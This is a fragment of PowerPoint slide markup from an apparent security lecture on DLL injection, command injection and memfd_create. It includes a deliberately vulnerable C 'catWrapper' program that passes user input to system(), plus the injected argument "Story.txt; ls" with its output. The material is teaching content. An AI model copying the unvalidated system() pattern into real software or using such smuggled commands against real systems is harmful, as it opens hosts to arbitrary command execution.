              <a:t>DLL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is often used to perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>user space API hooking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>There’s no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CreateRemoteThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> equivalent on Linux system, therefore we can only rely on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dirty="0"/>
              <a:t>. </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2</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Differences of DLL injection between Windows and Linux  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Michael </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Genkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3498426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endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600"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3</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342127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fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Command injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>system shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>In this attack, the attacker-supplied </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>operating system commands </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>are usually executed with the privileges of the vulnerable application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Command injection attacks are possible largely due to insufficient input validation.</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4</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Command Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Weilin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Zhong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="941520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This attack differs from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2" tooltip="wikilink"/>
              </a:rPr>
              <a:t>Code Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, in that code injection allows the attacker to add their own code that is then executed by the application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>In Command Injection, the attacker extends the default functionality of the application, which executes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>system commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, without the necessity of injecting code.</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5</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Command Injection vs Code Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Weilin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Zhong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3861666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060848"/>
            <a:ext cx="7948405" cy="4464496"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>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#include &lt;</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stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</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#include &lt;</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unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> main(</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int</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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, char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argv</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char cat[] = "cat ";</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char *command;</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size_t</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commandLength</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p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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commandLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =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strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(cat) +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strlen</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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[1]) + 1;</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command = (char *)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malloc</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commandLength</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strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(command, cat,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commandLength</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strncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(command,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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[1],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commandLength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -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strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(cat)) );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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system(command);</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return (0);</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a:t>
            </a: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6</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Code Example 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Weilin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Zhong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1706297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2675466"/>
            <a:ext cx="8856983" cy="3777869"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Used normally, the output is simply the contents of the file requested:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1"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catWrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Story.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1"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When last we left our heroes...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>However, if we add a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>semicolon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>another command to the end of this line</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, the command is executed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D8110"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>catWrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> with no complaint:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1"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catWrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "Story.txt; ls"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1"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When last we left our heroes...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1"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Story.txt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doubFree.c</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nullpointer.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1"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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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7</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Attack Scenario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Weilin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Zhong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3548557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endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4000"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8</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1123028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7"/>
            <a:ext cx="8496944" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define _GNU_SOURCE /* See </a:t>
            </a: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feature_test_macros</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(7) */ #include &lt;sys/</a:t>
            </a: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mman.h</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&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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int</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 </a:t>
            </a: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memfd_create</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a:t>
            </a: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const</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 char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</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 unsigned </a:t>
            </a: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int</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flags</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a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
